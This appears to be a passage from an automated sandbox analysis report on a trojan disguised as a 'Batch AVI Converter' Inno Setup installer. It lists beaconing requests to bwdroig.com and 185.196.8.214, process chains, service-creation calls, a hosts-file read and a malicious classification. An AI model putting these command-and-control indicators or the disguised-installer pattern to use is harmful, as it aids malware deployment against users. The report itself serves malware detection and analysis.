        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic | DNS traffic detected: DNS query: bwdroig.com
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.214/
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.214/sea
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.214/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://cscasha2.ocsp-certum.com04
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://ocsp.comodoca.com0
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: http://ocsp.sectigo.com0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://ocsp.thawte.com0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://repository.certum.pl/ctnca.cer09
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://s.symcd.com06
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://subca.ocsp-certum.com01
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://www.certum.pl/CPS0
        Source: file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/
        Source: file.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
        Source: file.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: http://www.openssl.org/f
        Source: is-NTR8S.tmp.1.dr | String found in binary or memory: http://www.openssl.org/support/faq.html
        Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps
        Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: https://d.symcb.com/cps0%
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: https://d.symcb.com/rpa0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: https://d.symcb.com/rpa0.
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: https://sectigo.com/CPS0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr | String found in binary or memory: https://www.certum.pl/CPS0
        Source: is-7PIOL.tmp.1.dr | String found in binary or memory: https://www.openssl.org/H
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0042F520 NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00423B84 NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004125D8 NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00478AC0 NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004706A8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004809F7
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004352C8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004673A4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0043035C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004444C8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004345C4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00444A70
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00486BD0
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00430EE8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0045F0C4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00445168
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0045B174
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00469404
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00445574
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004519BC
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00487B30
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0043DD50
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0048DF54
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_02371260
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_02371D20
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_00401051
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_00401C26
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02DC79DA
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02DBB8D7
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02DA53A0
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D9E17D
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D99E74
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02DA4E29
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D8EFAC
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D9DC89
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D98432
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D9AC2A
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D9E595
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02DA2DB4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00408C0C appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00406AC4 appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 0040595C appears 117 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00457F1C appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00403400 appears 60 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00445DD4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00457D10 appears 96 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 004344DC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 004078F4 appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00403494 appears 83 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00403684 appears 225 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 00453344 appears 97 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: String function: 004460A4 appears 59 times
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: String function: 02DA5330 appears 138 times
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: String function: 02D98AD0 appears 37 times
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-9JGQO.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-9JGQO.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-9JGQO.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-FH5VO.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: batchaviconverter32_64.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: DKIM Authenticator lib 9.11.45.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/27@1/1
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D908A8 FormatMessageA,GetLastError
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 3_2_0040273F
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0046E0E4 GetVersion,CoCreateInstance
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_0040B846 StartServiceCtrlDispatcherA,lstrcmpiW
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_0040223D LoadLibraryExA,lstrcmpiW,GetProcAddress,StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_0040B173 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_004021F8 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Programs
        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | File read: C:\Windows\win.ini
        Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: file.exe | ReversingLabs: Detection: 15%
        Source: file.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
        Source: file.exe | String found in binary or memory: /LOADINF="filename"
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
        Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Process created: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe "C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -i
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Process created: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe "C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -i
        Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: kernel.appcore.dll
